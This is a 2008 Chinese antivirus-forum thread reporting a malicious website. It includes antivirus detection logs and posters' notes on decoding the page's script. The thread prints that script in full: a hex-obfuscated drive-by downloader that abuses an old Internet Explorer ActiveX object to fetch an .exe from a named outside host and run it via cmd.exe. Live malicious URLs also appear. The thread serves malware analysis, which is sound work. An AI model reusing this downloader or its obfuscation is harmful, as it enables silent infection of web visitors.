毒网

显示全部楼层 · 发表于 2008-1-22 02:25:47

毒网

http://www.80diy.com/home/20040814/13/3274041.html

红伞报

xported events:

2008-1-22 2:44 [Guard] Malware found
   Virus or unwanted program 'HEUR/Exploit.HTML [HEUR/Exploit.HTML]'
   detected in file 'C:\Documents and Settings\Administrator\Application
   Data\Opera\Opera\profile\cache4\opr057FG.htm.
   Action performed: Move file to quarantine

随便抓了一个，GIF

[ 本帖最后由 cy6266812 于 2008-1-22 02:53 编辑 ]

显示全部楼层 · 发表于 2008-1-22 02:33:36

http://www.eheh001.cn/ms.htm
这个页面

显示全部楼层 · 发表于 2008-1-22 02:34:53

晕倒，要计算的啊。。。。。

function mymid(ss) {
return ss.substring(2);}
s="js"
flag_type=s
S="66756e6374696F6e20676E286E29200D0A7B200D0a766172206E756D626572203d204D6174682e72616E646F6D282"
S=S+"92A6E3B2072657475726E20277E746D70272B4d6174682E726F756e64286e756d626572292b272E657865273B200d"
S=S+"0A7d200D0A6C6A3d22687474703a2F2f7777772E656865683030312e636e2f61612e657865223b0d0A747279200D0"
S=S+"A7B206161613D226f223B0d0a6262623D22626a65223b0d0A7979793D226374223B0D0A6363633d2241646f64223b"
S=S+"0D0A6464643D22622e53747265616D223B0d0a6565653d224D6963726f736f66742E584d4C485454222b2250223B0"
S=S+"d0a6767673d226F223b0d0a6b6B6B3D2270223b0d0A6d6d6d3d2265223B0d0a7373733D226E223B0d0a7661722064"
S=S+"663d646F63756D656e742e637265617465456c656D656E74286161612b6262622b797979293b200d0a64662E73657"
S=S+"44174747269627574652822636c6173736964222c22636c7369643a42443936433535362D363541332d313144302D"
S=S+"393833412d30304330344643323945333622293b200d0A76617220783d64662e4372656174654f626a65637428656"
S=S+"5652C2222293b200d0A76617220533D64662E4372656174654F626a656374286363632B6464642c2222293B200D0a"
S=S+"532E747970653D313b200d0A782e6f70656E2822474554222c206c6A2C30293b0d0a782e73656E6428293B200D0a6"
S=S+"d7a313d676e283130303030293b200D0a76617220463D64662E4372656174654f626a656374282253637269707469"
S=S+"6e672E46696c6553797374656d4F626A656374222c2222293B200d0A76617220746d703D462e47657453706563696"
S=S+"16c466f6c6465722830293B206D7A313D20462e4275696c645061746828746D702C6D7A31293B200d0a532e4F7065"
S=S+"6e28293B0D0a7474743D782E726573706F6e7365426f64793B0d0A532e577269746528747474293B200D0A693d323"
S=S+"B0d0a535B2253617665546F46696C65225D286d7A312c69293B20532e436c6F736528293b200d0A76617220513d64"
S=S+"662e4372656174654f626A65637428225368656C6c2e4170706C69636174696f6E222c2222293b200D0A657870313"
S=S+"D462E4275696c645061746828746d702B275c5C737973272b2774656d3332272C27636D642E65786527293B200D0A"
S=S+"515b225368656c6c45222B22786563757465225d28657870312C27202f6320272B6d7a312c22222c6767672B6b6B6"
S=S+"B2B6D6D6d2B7373732C30293B200d0a7D206361746368286929207b20693d313b207d200D0A"
D=""
DO WHILE LEN(S)>1
k="&H"
k=k+ucase(LEFT(S,2))
p=CLng(k)
m=chr(p)
D=D+m
S=mymid(S)
LOOP
if flag_type="html" then
document.write(D)
end if
if flag_type="vbs" then
EXECUTE D
end if
if (flag_type=="js") {
var e;
try
{
eval(D);
}
catch(e){}
}

复制代码

显示全部楼层 · 发表于 2008-1-22 09:55:01

阿米教学时间到

选取所有s+=的部分
混淆的一种

然后按＋＝

第二次（注第二次意为转到左边，下同）
按下面的算法其实是ASCII码转换
由于都是生成器弄的暂时还没有新花样
是属于没有分割符的ASCII码
所以ASCII边上分割符不要填
直接按ASCII

你看到了什么？

nice～

http://www.eheh001.cn/aa.exe[:26:]

显示全部楼层 · 发表于 2008-1-22 10:15:16

原帖由 jimmyleo 于 2008-1-22 09:55 发表
阿米教学时间到

选取所有s+=的部分
混淆的一种

然后按＋＝

第二次（注第二次意为转到左边，下同）
按下面的算法其实是ASCII码转换
由于都是生成器弄的暂时还没有新花样
是属于没有分割符的ASCII码
所 ...

看来以后不能在毒网方面骗贴了

显示全部楼层 · 发表于 2008-1-22 10:23:11

e~~~~~~~~~~~~~~~~
谁帮我设计个图标……

显示全部楼层 · 发表于 2008-1-22 10:31:14

原帖由 jimmyleo 于 2008-1-22 10:23 发表
e~~~~~~~~~~~~~~~~
谁帮我设计个图标……

红伞区有你这么一个版主就足够了
应该再招一个高手来做版主助手....哈哈哈

显示全部楼层 · 发表于 2008-1-22 19:38:44

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Worm.Win32.Agent.zjq

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.28.11

显示全部楼层 · 发表于 2008-1-22 19:39:30

显示全部楼层 · 发表于 2008-1-22 20:11:03

原帖由 jimmyleo 于 2008-1-22 11:25 发表
阿米教学时间到

选取所有s+=的部分
混淆的一种

然后按＋＝

第二次（注第二次意为转到左边，下同）
按下面的算法其实是ASCII码转换
由于都是生成器弄的暂时还没有新花样
是属于没有分割符的ASCII码
所 ...

其实也只是简单的unescape加密，把代码提取出来，用document.write执行就可以了
不过有工具的确省时间

[已鉴定] 毒网

评分

2/1

全部是未找到网页或网络超时